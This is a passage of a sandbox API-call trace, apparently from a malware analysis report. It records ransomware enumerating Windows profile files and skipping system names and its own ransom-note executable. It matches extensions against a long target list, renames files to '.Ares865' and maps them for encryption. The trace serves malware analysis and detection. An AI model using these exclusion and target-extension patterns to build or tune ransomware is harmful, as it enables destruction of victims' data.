User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0065.090] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.090] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1267) returned 1 [0065.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.090] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.091] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.091] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.091] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x118 [0065.095] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0065.098] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.114] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.114] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0065.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0065.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.140] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.140] CloseHandle (hObject=0x118) returned 1 [0065.140] CloseHandle (hObject=0x164) returned 1 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.140] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0065.140] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="aoldtz.exe") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".") returned 1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="..") returned 1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="windows") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="bootmgr") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="temp") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="pagefile.sys") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="boot") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="ids.txt") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="ntuser.dat") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="perflogs") returned -1 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="MSBuild") returned -1 [0065.141] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0065.141] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 124 [0065.141] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="04_Music_played_in_the_last_month.wpl" | out: lpString1="04_Music_played_in_the_last_month.wpl") returned="04_Music_played_in_the_last_month.wpl" [0065.141] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0065.141] lstrlenW (lpString="Ares865") returned 7 [0065.141] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0065.141] lstrlenW (lpString=".dll") returned 4 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".dll") returned 1 [0065.141] lstrlenW (lpString=".lnk") returned 4 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".lnk") returned 1 [0065.141] lstrlenW (lpString=".ini") returned 4 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".ini") returned 1 [0065.141] lstrlenW (lpString=".sys") returned 4 [0065.141] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".sys") returned 1 [0065.141] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0065.141] lstrlenW (lpString="bak") returned 3 [0065.141] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0065.141] lstrlenW (lpString="ba_") returned 3 [0065.141] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0065.141] lstrlenW (lpString="dbb") returned 3 [0065.141] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0065.141] lstrlenW (lpString="vmdk") returned 4 [0065.141] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0065.141] lstrlenW (lpString="rar") returned 3 [0065.141] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0065.142] lstrlenW (lpString="zip") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0065.142] lstrlenW (lpString="tgz") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0065.142] lstrlenW (lpString="vbox") returned 4 [0065.142] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0065.142] lstrlenW (lpString="vdi") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0065.142] lstrlenW (lpString="vhd") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0065.142] lstrlenW (lpString="vhdx") returned 4 [0065.142] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0065.142] lstrlenW (lpString="avhd") returned 4 [0065.142] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0065.142] lstrlenW (lpString="db") returned 2 [0065.142] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0065.142] lstrlenW (lpString="db2") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0065.142] lstrlenW (lpString="db3") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0065.142] lstrlenW (lpString="dbf") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0065.142] lstrlenW (lpString="mdf") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0065.142] lstrlenW (lpString="mdb") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0065.142] lstrlenW (lpString="sql") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0065.142] lstrlenW (lpString="sqlite") returned 6 [0065.142] lstrcmpiW (lpString1="th.wpl", lpString2="sqlite") returned 1 [0065.142] lstrlenW (lpString="sqlite3") returned 7 [0065.142] lstrcmpiW (lpString1="nth.wpl", lpString2="sqlite3") returned -1 [0065.142] lstrlenW (lpString="sqlitedb") returned 8 [0065.142] lstrcmpiW (lpString1="onth.wpl", lpString2="sqlitedb") returned -1 [0065.142] lstrlenW (lpString="xml") returned 3 [0065.142] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0065.143] lstrlenW (lpString="$er") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0065.143] lstrlenW (lpString="4dd") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0065.143] lstrlenW (lpString="4dl") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0065.143] lstrlenW (lpString="^^^") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0065.143] lstrlenW (lpString="abs") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0065.143] lstrlenW (lpString="abx") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0065.143] lstrlenW (lpString="accdb") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accdb") returned 1 [0065.143] lstrlenW (lpString="accdc") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accdc") returned 1 [0065.143] lstrlenW (lpString="accde") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accde") returned 1 [0065.143] lstrlenW (lpString="accdr") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accdr") returned 1 [0065.143] lstrlenW (lpString="accdt") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accdt") returned 1 [0065.143] lstrlenW (lpString="accdw") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accdw") returned 1 [0065.143] lstrlenW (lpString="accft") returned 5 [0065.143] lstrcmpiW (lpString1="h.wpl", lpString2="accft") returned 1 [0065.143] lstrlenW (lpString="adb") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.143] lstrlenW (lpString="adb") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.143] lstrlenW (lpString="ade") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0065.143] lstrlenW (lpString="adf") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0065.143] lstrlenW (lpString="adn") returned 3 [0065.143] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0065.143] lstrlenW (lpString="adp") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0065.144] lstrlenW (lpString="alf") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0065.144] lstrlenW (lpString="ask") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0065.144] lstrlenW (lpString="btr") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0065.144] lstrlenW (lpString="cat") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0065.144] lstrlenW (lpString="cdb") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0065.144] lstrlenW (lpString="ckp") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0065.144] lstrlenW (lpString="cma") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0065.144] lstrlenW (lpString="cpd") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0065.144] lstrlenW (lpString="dacpac") returned 6 [0065.144] lstrcmpiW (lpString1="th.wpl", lpString2="dacpac") returned 1 [0065.144] lstrlenW (lpString="dad") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0065.144] lstrlenW (lpString="dadiagrams") returned 10 [0065.144] lstrcmpiW (lpString1="_month.wpl", lpString2="dadiagrams") returned -1 [0065.144] lstrlenW (lpString="daschema") returned 8 [0065.144] lstrcmpiW (lpString1="onth.wpl", lpString2="daschema") returned 1 [0065.144] lstrlenW (lpString="db-journal") returned 10 [0065.144] lstrcmpiW (lpString1="_month.wpl", lpString2="db-journal") returned -1 [0065.144] lstrlenW (lpString="db-shm") returned 6 [0065.144] lstrcmpiW (lpString1="th.wpl", lpString2="db-shm") returned 1 [0065.144] lstrlenW (lpString="db-wal") returned 6 [0065.144] lstrcmpiW (lpString1="th.wpl", lpString2="db-wal") returned 1 [0065.144] lstrlenW (lpString="dbc") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0065.144] lstrlenW (lpString="dbs") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0065.144] lstrlenW (lpString="dbt") returned 3 [0065.144] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0065.144] lstrlenW (lpString="dbv") returned 3 [0065.145] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0065.145] lstrlenW (lpString="dbx") returned 3 [0065.145] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0065.145] lstrlenW (lpString="dcb") returned 3 [0065.145] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0065.145] lstrlenW (lpString="dct") returned 3 [0065.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.Ares865") returned 135 [0065.145] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0065.147] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.147] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1284) returned 1 [0065.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.147] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0065.148] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.148] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.148] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x118 [0065.150] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x190000 [0065.155] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.156] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.156] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.157] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.164] CloseHandle (hObject=0x118) returned 1 [0065.164] CloseHandle (hObject=0x164) returned 1 [0065.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.164] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="aoldtz.exe") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".") returned 1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="..") returned 1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="windows") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="bootmgr") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="temp") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="pagefile.sys") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="boot") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="ids.txt") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="ntuser.dat") returned -1 [0065.164] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="perflogs") returned -1 [0065.165] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="MSBuild") returned -1 [0065.165] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0065.165] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 127 [0065.165] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="05_Pictures_taken_in_the_last_month.wpl" | out: lpString1="05_Pictures_taken_in_the_last_month.wpl") returned="05_Pictures_taken_in_the_last_month.wpl" [0065.165] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0065.165] lstrlenW (lpString="Ares865") returned 7 [0065.165] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0065.165] lstrlenW (lpString=".dll") returned 4 [0065.165] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".dll") returned 1 [0065.165] lstrlenW (lpString=".lnk") returned 4 [0065.165] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".lnk") returned 1 [0065.165] lstrlenW (lpString=".ini") returned 4 [0065.165] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".ini") returned 1 [0065.165] lstrlenW (lpString=".sys") returned 4 [0065.165] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".sys") returned 1 [0065.165] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0065.165] lstrlenW (lpString="bak") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0065.165] lstrlenW (lpString="ba_") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0065.165] lstrlenW (lpString="dbb") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0065.165] lstrlenW (lpString="vmdk") returned 4 [0065.165] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0065.165] lstrlenW (lpString="rar") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0065.165] lstrlenW (lpString="zip") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0065.165] lstrlenW (lpString="tgz") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0065.165] lstrlenW (lpString="vbox") returned 4 [0065.165] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0065.165] lstrlenW (lpString="vdi") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0065.165] lstrlenW (lpString="vhd") returned 3 [0065.165] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0065.166] lstrlenW (lpString="vhdx") returned 4 [0065.166] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0065.166] lstrlenW (lpString="avhd") returned 4 [0065.166] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0065.166] lstrlenW (lpString="db") returned 2 [0065.166] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0065.166] lstrlenW (lpString="db2") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0065.166] lstrlenW (lpString="db3") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0065.166] lstrlenW (lpString="dbf") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0065.166] lstrlenW (lpString="mdf") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0065.166] lstrlenW (lpString="mdb") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0065.166] lstrlenW (lpString="sql") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0065.166] lstrlenW (lpString="sqlite") returned 6 [0065.166] lstrcmpiW (lpString1="th.wpl", lpString2="sqlite") returned 1 [0065.166] lstrlenW (lpString="sqlite3") returned 7 [0065.166] lstrcmpiW (lpString1="nth.wpl", lpString2="sqlite3") returned -1 [0065.166] lstrlenW (lpString="sqlitedb") returned 8 [0065.166] lstrcmpiW (lpString1="onth.wpl", lpString2="sqlitedb") returned -1 [0065.166] lstrlenW (lpString="xml") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0065.166] lstrlenW (lpString="$er") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0065.166] lstrlenW (lpString="4dd") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0065.166] lstrlenW (lpString="4dl") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0065.166] lstrlenW (lpString="^^^") returned 3 [0065.166] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0065.166] lstrlenW (lpString="abs") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0065.167] lstrlenW (lpString="abx") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0065.167] lstrlenW (lpString="accdb") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accdb") returned 1 [0065.167] lstrlenW (lpString="accdc") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accdc") returned 1 [0065.167] lstrlenW (lpString="accde") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accde") returned 1 [0065.167] lstrlenW (lpString="accdr") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accdr") returned 1 [0065.167] lstrlenW (lpString="accdt") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accdt") returned 1 [0065.167] lstrlenW (lpString="accdw") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accdw") returned 1 [0065.167] lstrlenW (lpString="accft") returned 5 [0065.167] lstrcmpiW (lpString1="h.wpl", lpString2="accft") returned 1 [0065.167] lstrlenW (lpString="adb") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.167] lstrlenW (lpString="adb") returned 3 [0065.167] 